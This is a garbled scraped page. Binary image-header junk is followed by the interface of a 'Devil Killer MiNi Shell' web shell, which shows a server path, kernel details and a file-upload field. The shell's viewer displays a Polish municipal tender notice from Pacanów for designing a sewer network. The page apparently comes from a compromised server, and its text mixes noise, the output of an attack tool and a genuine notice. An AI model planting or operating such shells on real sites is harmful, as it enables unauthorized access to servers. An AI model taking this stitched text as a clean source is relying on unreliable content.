JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160107/4730-N-2016.html

<p class="kh_header"><b>Pacanów: Opracowanie dokumentacji projektowej na budowę sieci kanalizacji sanitarnej w miejscowościach: Niegosławice, Książnice, Słupia, Karsy Duże i Karsy Małe</b><br>
<b>Numer ogłoszenia: 4730 - 2016; data zamieszczenia: 07.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pacanów , Rynek 15, 28-133 Pacanów, woj. świętokrzyskie, tel. 41 3765403, faks 41 3765980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pacanow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na budowę sieci kanalizacji sanitarnej w miejscowościach: Niegosławice, Książnice, Słupia, Karsy Duże i Karsy Małe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest wykonanie  dokumentacji  projektowo-kosztorysowej budowy sieci kanalizacji sanitarnej w miejscowościach  Niegosławice,  Książnice, Słupia, Karsy Duże i Karsy Małe  wraz z dokonaniem w imieniu Zamawiającego niezbędnych uzgodnień oraz uzyskaniem wymaganych do realizacji decyzji (w tym pozwolenia na budowę) oraz sprawowaniem  nadzoru  autorskiego.  

2.1. Zakres  przedmiotu zamówienia obejmuje wykonanie dokumentacji  projektowej ( projekt budowlano-wykonawczy)  wraz z opisem przedmiotu zamówienia na budowę  sieci kanalizacji sanitarnej z odgałęzieniami sieci  (tj. do granicy działki  lub do pierwszej studzienki na działce)  w 5 miejscowościach gminy Pacanów. Dodatkowo należy uwzględnić opracowanie odrębnego projektu w zakresie  przyłączy kanalizacyjnych (odcinek od budynku do pierwszej studzienki).  
Obszar objęty opracowaniem obecnie zamieszkuje łącznie około 1201 osób, w tym uwzględniając podział na miejscowości: Niegosławice - 135 osób, Książnice -286 osób, Słupia - 545 osób, Karsy Duże - 58 osób, Karsy Małe -177. Na terenie objętych opracowaniem zlokalizowanych jest ok. 300 budynków mieszkalnych.
Wstępnie zakłada  się budowę sieci  kanalizacyjnej w układzie  grawitacyjno-tłocznym o szacunkowej łącznej  długości około 33 km (długość głównej sieci kanalizacyjnej -  rurociągi tłoczne i grawitacyjne, dane na podstawie  Koncepcji Programowej Kanalizacji Sanitarnej Aglomeracji Pacanów - wariant rozszerzony dla miejscowości objętych opracowaniem), z przyłączami oraz  niezbędną liczbą przepompowni  przyzagrodowych oraz przepompowni sieciowych ścieków wraz z zasilaniem. Dodatkowo należy  przewidzieć wyposażenie  projektowanej sieci kanalizacyjnej  w system  zdalnego sterowania i monitorowania sieci kanalizacyjnej, który winien  zostać zaprojektowany  według wytycznych Zamawiającego. Sieć kanalizacji sanitarnej będzie zlokalizowana na działkach prywatnych oraz w  pasach dróg gminnych, powiatowych i  krajowych. Ścieki będą odprowadzone do istniejącej oczyszczalni ścieków w miejscowości Słupia. 
W przypadku pojedynczych budynków mieszkalnych znacznie oddalonych od istniejącej zwartej zabudowy, gdzie budowa zbiorczej sieci kanalizacyjnej będzie nieuzasadniona ekonomicznie zakres zamówienia obejmuje również zaprojektowanie przydomowych oczyszczalni ścieków, o parametrach i technologii dostosowanej do każdej posesji, uwzględniających  lokalne warunki terenowe i gruntowe.

Przedmiot zamówienia winien uwzględnić opracowanie  dokumentacji projektowo-kosztorysowych  wraz z uzyskaniem wymaganych uzgodnień i decyzji  odrębnie dla poszczególnych  zadań  inwestycyjnych ( tzn.  dla sieci kanalizacyjnej  odrębnie  dla poszczególnych miejscowości, oczyszczalni przydomowych - dla każdej posesji) zgodnie z wytycznymi Zamawiającego.

Koncepcyjny przebieg sieci kanalizacyjnej  oraz proponowaną lokalizację przydomowych oczyszczalni ścieków w tym również  dla obszaru-miejscowości objętych przedmiotem zamówienia przedstawia załącznik nr 9  do niniejszej SIWZ ( Koncepcja programowa kanalizacji sanitarnej Aglomeracji Pacanów). 
Zawarte w udostępnionym dokumencie  dane mają charakter orientacyjny.  Przedstawione  w koncepcji  rozwiązania techniczne oraz proponowany  przebieg sieci kanalizacyjnej nie są dla  Wykonawcy obligatoryjne i  trakcie realizacji prac projektowych mogą ulec zmianie. W związku z powyższym Zmawiający zaleca Wykonawcom weryfikację  we własnym zakresie przedstawionych  założeń i rozwiązań celem poprawnego oszacowania ceny oferty.  

2.2.  Zakres zamówienia obejmuje między innymi:
a)	uzyskanie i aktualizacja map do celów projektowych, uzyskanie niezbędnych  wypisów z rejestrów gruntów,
b)	przygotowanie i przedstawienie do akceptacji wstępnej koncepcji przebiegu sieci kanalizacyjnej i lokalizacji przepompowni jak również rozwiązań w zakresie wyboru materiałów, studni, przepompowni, armatury, oraz technologii przydomowych oczyszczalni ścieków,
c)	przygotowanie dokumentacji i opracowań wymaganych  do uzyskania  wszelkich niezbędnych  opinii, uzgodnień i pozwoleń wymaganych przepisami, 
d)	uzyskanie w imieniu Zamawiającego  wszelkich niezbędnych  decyzji, uzgodnień (w tym branżowych) i opinii ( m.in.  ZUDP, uzgodnienie z Wojewódzkim Zarządem Melioracji i Urządzeń Wodnych, Konserwatorem Zabytków, GDDKiA, PZD, Zakładem Energetycznym) wymaganych dla zatwierdzenia dokumentacji oraz wydania pozwolenia na budowę lub  zgłoszenia robót, 
e)	opracowanie  kompletnych i poprawnych wniosków wraz z wymaganymi dokumentami ( w tym m.in.: karty informacyjnej  przedsięwzięcia -  raportu o oddziaływaniu przedsięwzięcia na środowisko)    i wystąpienie  w imieniu  inwestora o wydanie  niezbędnych  decyzji w tym: decyzji  o środowiskowych uwarunkowaniach zgody na realizację inwestycji, decyzji  o ustalenie lokalizacji inwestycji  celu publicznego oraz innych niezbędnych do uzyskania pozwolenia na budowę- zgłoszenia, 
f)	przygotowania trasy projektowanej sieci wraz z zestawieniem właścicieli, użytkowników gruntów  (z uwzględnieniem danych z ewidencji gruntów) zawierającym dane  dot.: numeru działki, danych właściciela, rodzaju projektowanego na działce urządzenia lub uzbrojenia, sekcji mapowej - do wniosku o ustalenie warunków zabudowy i zagospodarowania terenu - postępowania środowiskowego,
g)	uzgodnienie trasy z właścicielami nieruchomości wraz z  okazaniem projektu na gruncie  wszystkim zainteresowanym,
h)	uzyskanie pisemnych zgód ( wraz z uzyskaniem pisemnej akceptacji Właściciela  na załączniku graficznym przedstawiającym projektowany przebieg sieci kanalizacji  sanitarnej wraz z urządzeniami) na lokalizację sieci oraz czasowe zajęcie terenu niezbędnego na okres realizacji inwestycji od właścicieli nieruchomości przez których działki będzie przebiegać inwestycja, 
i)	wykonanie operatu wodno-prawnego oraz uzyskanie  pozwolenia wodno-prawnego ( w przypadku gdy będzie wymagana), 
j)	wykonanie  dokumentacji projektowej  uwzględniającej  wytyczne  i uwagi  Zamawiającego obejmującej:
- wykonanie projektu  budowlano-wykonawczego dla sieci kanalizacyjnej z odgałęzieniami, projektu przyłączy do budynków oraz projektu  budowlano-wykonawczego  przydomowych oczyszczalni  ścieków  (5 egzemplarzy w formie papierowej  i wersja elektroniczna w formacie PDF, dwg, doc ) zawierającego   m. in. :
- projekt  zagospodarowanie terenu,  opis techniczny, część graficzną;
-	dokumentację formalno -prawną, (wszystkie wymagane prawem budowlanym i przepisami wykonawczymi uzyskane w imieniu Zamawiającego opinie, uzgodnienia, decyzje oraz postanowienia niezbędne do uzyskania pozwolenia na budowę-zgłoszenia robót),
-	zestawienie tabelaryczne odgałęzień kanalizacyjnych objętych opracowaniem,
-	dokumentacje geotechniczną,
-	projekt dotyczący ewentualnego odwodnienia wykopów,
-	projekt dotyczący ewentualnej przebudowy kolidującej infrastruktury technicznej - uzgodniony z odpowiednimi właścicielami uzbrojenia,
-	 projekt dotyczący dojazdu do projektowanych przepompowni  ścieków z dróg publicznych,
-	 projekt  przyłączy elektrycznych, oraz projekt sterowania i monitoringu projektowanych przepompowni - wykonawca winien uzyskać w imieniu Gminy Pacanów warunki techniczne przyłączenia projektowanych przepompowni do sieci energetycznej oraz opracować i uzgodnić dokumentację przyłączenia,
-	projekt odtworzenia nawierzchni po robotach uzgodniony z właściwym dla danego obszaru zarządcą drogi lub właścicielem terenu,
-	opracowanie dot. ewentualnych drzew i krzewów przeznaczonych do wycinki wraz ich inwentaryzacją,  (Zmawiający wymaga aby Wykonawca zaprojektował sieć w taki sposób aby uniknąć kolizji z drzewami i krzewami, ewentualną  wycinkę należy  traktować jako rozwiązanie ostateczne),
-	opracowanie Informacji  BIOZ,  
- dokumentacje terenowo-prawną ( 2  egzemplarze  w formie papierowej w tym oryginał + wersja elektroniczna ) ,  w zakresie  prawa dysponowania  przez Gminę Pacanów  nieruchomością  obejmująca  umowy  udostępnia  terenu na czas budowy i umowy regulujące zasady korzystania z gruntów podmiotów prywatnych po wybudowaniu na ich nieruchomości zaprojektowanych urządzeń i uzbrojenia.  Dokumentacja winna zawierać m.in. mapy sytuacyjno-wysokościowe z naniesionym w kolorze zaprojektowanymi urządzeniami i uzbrojeniem, tabelaryczne zestawienie ( dot.: numeru działki, danych właściciela, rodzaju projektowanego na działce urządzenia lub uzbrojenia wraz z  podstawowymi parametrami, numeru zawartej umowy),  umowy zawarte z poszczególnymi  właścicielami działek, w których wyrażają zgodę na zlokalizowanie i wybudowanie na ich nieruchomości projektowanych urządzeń i uzbrojenia. Każda umowa winna posiadać załącznik graficzny tj. mapę z przebiegiem sieci, bądź lokalizacją urządzenia z podpisem właścicieli działek.
- opracowanie  Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych (STWiORB) - (1 egzemplarz  w formie papierowej + wersja elektroniczna w formacie PDF), 
- przedmiar robót wraz z zestawieniem materiału -  ( 3  egzemplarze  w formie papierowej + wersja elektroniczna  w formacie PDF, ath ). Przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych. Scalone pozycje przedmiaru muszą odpowiadać grupie pozycji z kosztorysów inwestorskich.  Przedmiar należy opracować odrębnie dla każdego zadania zgodnie z wytycznymi Zamawiającego.
- kosztorys inwestorski wraz ze zbiorczym zestawieniem kosztów - ( 1  egzemplarz  w formie papierowej i wersja elektroniczna  w formacie PDF, ath ). Kosztorys należy opracować dla każdego zadania odrębnie.

Opracowana dokumentacja projektowa powinna zawierać oświadczenie projektanta i sprawdzającego o sporządzeniu projektu budowlano-wykonawczego zgodnie z obowiązującymi przepisami i zasadami wiedzy technicznej  wraz z zaświadczeniami o wpisie na listę członków właściwej izby samorządu zawodowego.
Dokumentacja projektowa powinna być zaopatrzona w wykaz opracowań oraz pisemne oświadczenie projektanta, że jest wykonana zgodnie z zamówieniem i umową, obowiązującymi przepisami, normami i zasadami wiedzy technicznej i że wydana jest w stanie kompletności z punktu widzenia celu, któremu ma służyć.
Dokumentacja winna być opracowana w zakresie i formie niezbędnej  dla  uzyskania decyzji pozwolenia na budowę oraz udzielenia  przez Zamawiającego zamówienia na realizację robót budowlanych  i zrealizowania zadania inwestycyjnego zgodnie z obowiązującymi przepisami. Ponadto dokumentacja projektowa  stanowiące przedmiot zamówienia winna  być kompletna, opracowana zgodnie z obowiązującymi normami, warunkami technicznymi, przepisami prawa, w tym w szczególności zgodnie z Ustawą z dnia 7 lipca 1994r. Prawo Budowlane ( tj. Dz.U. 2013. 1409 z późn. zm.), Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego ( tj. Dz.U. 2013.1129 z późn. zm.), Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. z 2004r. Nr 130, poz.1389 z późn. zm.) oraz ustawą Prawo zamówień publicznych (t.j. Dz.U. z 2013r. poz. 907 z póź. zm.).
W swojej treści dokumentacja projektowa powinna określać przedmiot zamówienia, w tym  w szczególności technologię, materiały i urządzenia w sposób nie utrudniający uczciwej konkurencji. Dokumentacja nie może opisywać przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu zamówienia lub nie można tego opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy -lub równoważne-, ponadto należy określić parametry tych rozwiązań. Dokumentacja projektowa powinna opisywać przedmiot zamówienia za pomocą cech technicznych i jakościowych przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane.

k)	przygotowanie kompletnego wniosku  w imieniu Zamawiającego  oraz uzyskanie decyzji  pozwolenia na budowę/ zgłoszenie robót,
l)	pełnienie nadzoru autorskiego.

2.3	Zastosowane rozwiązania projektowe powinny być optymalne, wyważone ekonomicznie, gwarantujące niskie koszty realizacji i  późniejszej eksploatacji oraz małą awaryjność przy zachowaniu wszelkich niezbędnych wymagań wynikających z obowiązujących przepisów prawa w tym m.in.: Prawa budowlanego, Prawa ochrony środowiska, Prawa wodnego oraz norm branżowych. Materiały do budowy sieci kanalizacyjnej powinny zostać dobrane na podstawie analizy techniczno-ekonomicznej biorąc pod uwagę warunki lokalizacyjne, parametry gruntowo-wodne. Propozycje opracowanych przez Wykonawcę rozwiązań projektowych będą wymagały akceptacji Zamawiającego.
W trakcie opracowywania dokumentacji  projektowej Wykonawca winien  kierować się  następującymi zasadami:
a)	układ projektowanej sieci kanalizacyjnej należy dostosować do ukształtowania terenu, zabudowy, układu ciągów komunikacyjnych oraz położenia miejscowości względem oczyszczalni ścieków,  
b)	projektowane kanały winny być zlokalizowane w miarę możliwości w terenie ogólnodostępnym, z możliwością dojazdu  w pobliże studzienek rewizyjnych  specjalistycznym  pojazdem w celu wykonywania niezbędnych czynności eksploatacyjnych,
c)	należy unikać lokalizacji studzienek w zagłębieniach terenu i innych miejscach narażonych na gromadzenie się wód opadowych,
d)	należy unikać projektowania sieci w sposób kolidujący z istniejącymi obiektami, zielenią (drzewami) i infrastrukturą podziemną,
e)	w przypadku lokalizacji rurociągów w pasach dróg należy uzyskać zgodę Zamawiającego, 
f)	przepompownie należy tak zaprojektować aby ograniczyć do minimum wydobywanie nieprzyjemnych zapachów,
g)	lokalizacja jak również przyjęta technologia przydomowych oczyszczalni ścieków na terenie poszczególnych nieruchomości  winna uwzględniać warunki gruntowo-wodne  ( w tym poziom wód gruntowych, przepuszczalność gruntu), wielkość działki oraz znajdujące się na terenie posesji lub w ich pobliżu studnie.  Przepustowość oczyszczalni należy ustalić w oparciu o  potrzeby bilansowe dla poszczególnych posesji.  Zaprojektowane rozwiązania techniczne muszą gwarantować wysoki stopień oczyszczania ścieków, być ekonomiczne, o wysokiej jakości technicznej i spełniać warunki określone w  Rozporządzeniu Ministra Środowiska z dnia 24 lipca 2006 r. w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego.

2.4	W ramach zakresu przedmiotu zamówienia Wykonawca  zobowiązany będzie do udziału we wszystkich spotkaniach koordynacyjnych zwoływanych w miarę potrzeb w terminach wyznaczonych przez Zamawiającego. Zobowiązany będzie także   do udziału w ewentualnie organizowanych  przez Zamawiającego zebraniach konsultacyjnych z zainteresowanymi mieszkańcami.  Projekt  w fazie roboczej należy  także uzgadniać z  przedstawicielami Zamawiającego. 

2.5	Z uwagi na zamiar  ubiegania się przez Zamawiającego o  dofinansowanie realizacji inwestycji  Wykonawca w ramach  przedmiotu zamówienia  zobowiązany będzie do pełnej współpracy z Zamawiającym w zakresie udzielania niezbędnych informacji  dotyczących  projektowanej sieci kanalizacyjnej ( w tym: opisu, zastosowanej technologii, podstawowych parametrów, harmonogramu rzeczowo-finansowego itp.) jak również do opracowania na  wniosek Zamawiającego  dokumentów wymaganych  do wniosku o dofinansowanie  inwestycji.

2.6	Wykonawca będzie informować Zamawiającego na bieżąco o postępie i zaawansowaniu prac przy realizacji przedmiotu zamówienia. Ponadto na prośbę Zamawiającego Wykonawca będzie zobowiązany do przedstawienia pisemnej informacji z realizacji zadania wraz z aktualnym harmonogramem prac.
 
2.7	Wykonawca jest zobowiązany do bezpłatnej aktualizacji kosztorysu  inwestorskiego  co 6 miesięcy do czasu wyłonienia  Wykonawcy  robót ( na pisemny  wniosek Zamawiającego).
2.8	Wykonawca opracuje projekt budowlany zgodnie z wymaganiami ustawy prawo budowlane, aktualnie obowiązującymi przepisami, normami branżowymi, warunkami technicznymi, sztuką budowlaną, zasadami współczesnej wiedzy technicznej i z należytą starannością.
2.9	Wykonawca jest  zobowiązany do  sprawowania  nadzoru autorskiego (bez dodatkowego wynagrodzenia) w zakresie obejmującym w szczególności:
a)	pisemnego  udzielania wyjaśnień i odpowiedzi dotyczących opracowanej dokumentacji projektowo-kosztorysowej w zakresie niezbędnym  do prawidłowego  przeprowadzenia procedury  przetargowej na wykonawstwo w terminie do 3 dni roboczych  od ich przekazania przez Zamawiającego, jak również informacji  dotyczących   projektu niezbędnych  Zamawiającemu do wykonania  innych opracowań  związanych z pozyskiwaniem środków  finansowych i realizacją, 
b)	udzielania informacji telefonicznych i pisemnych oraz wyjaśnianie wątpliwości dotyczących opracowanej dokumentacji projektowej i zawartej w niej rozwiązań w terminie do 3 dni roboczych od ich przekazania przez Zamawiającego,
c)	uzgadnianie z Zamawiającym i Wykonawcą możliwości wprowadzenia  rozwiązań  zamiennych w stosunku do  przewidzianych w dokumentacji projektowej,
d)	wprowadzanie rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej - na wniosek Zamawiającego,
e)	ewentualne uzupełnienie szczegółów dokumentacji projektowej,
f)	wyjaśnianie szczegółów na budowie w trakcie realizacji inwestycji, udział  w naradach - na wniosek zamawiającego,
g)	sprawdzanie zgodności realizacji robót ( w tym dotyczących materiałów i urządzeń) z zakresem dokumentacji projektowe.
Wykonawca w czasie realizacji robót zobowiązany będzie  w ramach  nadzoru autorskiego  do max. 10 wizyt na budowie na pisemne wezwanie Zamawiającego  ( nie wynikających z wad projektu).

2.10	 Obszar na którym realizowana będzie inwestycja podlega  ochronie prawnej w aspekcie  ochrony dziedzictwa przyrodniczego ze względu na położenie w Solecko-Pacanowskim Obszarze Chronionego Krajobrazu. Ponadto na obszarze na którym będzie realizowana inwestycja znajdują się tereny biernej ochrony  archeologicznej. W miejscowości Książnice znajdują się czynne stanowiska archeologiczne.
2.11	  W cenie wykonania dokumentacji należy uwzględnić wszystkie niezbędne   koszty  w tym: uzyskania materiałów i dokumentów (np. map, wypisów itd.), koszty aktualizacji map, koszty inwentaryzacji,  uzgodnień terenowych, uzyskania warunków technicznych, uzgodnień, opinii, wymaganych decyzji i pozwoleń  oraz koszty nadzoru autorskiego uwzględniającego m.in.  ewentualne wizyty na budowie w trakcie realizacji inwestycji oraz konieczność aktualizacji kosztorysów inwestorskich.
2.12	 Wszelkie prace projektowe lub czynności nie opisane w niniejszym rozdziale a wynikające z procedur określonych w przepisach szczególnych, niezbędne do właściwego i kompletnego opracowania dokumentacji projektowej, uzyskania niezbędnych uzgodnień oraz decyzji należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia. Przedmiot zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania przedmiotowego zamówienia w zakresie rzeczowym ujętym w niniejszej siwz oraz wzorze umowy.
2.13	 Projektant ponosi pełną odpowiedzialność za wady i błędy projektowe ujawnione w okresie procedur administracyjnych, jak również ujawnione w toku wdrażania do realizacji przedmiotu umowy. Projektant odpowiada za wady i błędy w przedmiarze robót, ujawnione podczas trwania procedury przetargowej na roboty budowlane,  a w przypadku ich stwierdzenia będzie zobowiązany w wyznaczonym przez Zamawiającego terminie do wprowadzenia odpowiednich poprawek lub uzupełnień, bez dodatkowego wynagrodzenia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20 % wartości zamówienia podstawowego. Ewentualne zamówienia zostaną udzielone w trybie przewidzianym  w art.67 ust. 1 pkt 6 ustawy Prawo Zamówień Publicznych, jeżeli spełnione zostaną przesłanki ustawowe.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga złożenia wadium w wysokości 3 000,00 zł ( trzy tysiące  złotych). Wadium może być wniesione zgodnie z art. 45 ust.6 ustawy PZP tj; w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz.275). Wykonawca który nie wniósł wadium, zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Nadwiślański Bank Spółdzielczy Solec-Zdrój oPacanów  58 85170007 0040 0400 0172 0020 z dopiskiem:  Wadium na zadanie - Opracowanie dokumentacji projektowej na  budowę sieci kanalizacji sanitarnej w miejscowościach: Niegosławice, Książnice, Słupia, Karsy Duże i Karsy  Małe. Kserokopie dowodu wpłaty (polecenie przelewu) należy dołączyć do oferty. 
3.	Wadia w formach niepieniężnych należy dołączyć w oryginale do oferty.
